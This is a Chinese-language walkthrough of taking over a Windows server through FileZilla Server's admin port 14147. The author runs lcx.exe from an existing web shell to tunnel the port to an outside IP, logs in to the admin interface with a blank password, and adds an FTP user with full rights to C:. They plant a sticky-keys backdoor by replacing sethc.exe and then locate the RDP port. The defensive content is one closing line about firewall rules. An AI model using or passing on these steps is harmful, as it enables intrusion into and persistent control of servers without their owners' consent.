這里為大家分享一下FileZilla Server 利用14147端口提權視頻教程，這樣對于防御就有了個不錯的思路，最后對給大家一個預防思路啊。

做個教程投稿，不知道有沒有獎勵~~

開了有3306，說明有root，不過我試了root賬戶被降權了，也就沒法利用了，

所以利用14147提權，

用lcx端口轉發(fā)工具，把14147端口轉發(fā)到我們本機，

shell上運行D:\RECYCLER\lcx.exe -slave 42.239.18.58 327 127.0.0.1 14147

這樣把14147轉發(fā)到我們本機的327端口上，

先本機監(jiān)聽，本機運行l(wèi)cx -listen 327 3333

是把327轉發(fā)到3333，

現(xiàn)在在shell運行，

[+] Accept a Client on port 327 from 103.31.75.78 .....
[+] Waiting another Client on port:3333....

OK，然后我們本機下載FileZilla Server這個軟件，來連接登錄上去，

端口是3333，管理密碼一般都是空，

已連接, 等待認證
協(xié)議警告: 服務器版本不匹配: 服務器版本為 0.9.51.32, 管理界面版本為 0.9.65.0
協(xié)議錯誤: 協(xié)議版本不匹配: 服務器協(xié)議版本為 0.1.11.0, 管理界面協(xié)議版本為 0.1.13.0

出現(xiàn)這個提示，說明版本不匹配，怎么辦呢，他這個版本如果是老版本，網(wǎng)上還難找，

一般軟件安裝目錄，是有權限瀏覽的，然后就能下載咯，我們在他服務器上下載他的，就和他的版本一樣了，

D盤沒有，

對路徑“C:\”的訪問被拒絕。

訪問不了C盤根目錄，我們直接訪問C:\Program Files\

看到?jīng)]，F(xiàn)ileZilla Server，進去，下載里面的文件到本機，是可以下載的，我已經(jīng)下載過了，

已連接，正在等待驗證
已登錄

然后點用戶，添加一個自己的，密碼勾上設置個密碼，也可以不設置就是空密碼，

然后點共享文件夾，添加一個C盤，右側的權限都勾上，然后保存，

現(xiàn)在用FTP軟件連接，端口一般是21，點編輯，設置這里可以看到端口，

現(xiàn)在C盤完全控制，上shift后門咯，

替換掉下面這兩個文件夾的sethc文件，
C:\windows\system32\sethc.exe
C:\windows\system32\dllcache\sethc.exe

我用cmd替換，倆都換好了，現(xiàn)在找遠程端口，

查服務tasklist /svc

svchost.exe                   1628 TermService 

TermService  的PID是1628，現(xiàn)在找PID 1628 對應的端口，就是遠程端口咯，

查端口netstat -ano

TCP    0.0.0.0:7755           0.0.0.0:0              LISTENING       1628

端口是7755

OK服務器到手。

教程到此結束。

腳本之家小編給出的防御方法：通過端口策略或防火墻，禁止本地的14147連接任意ip的任意端口即可。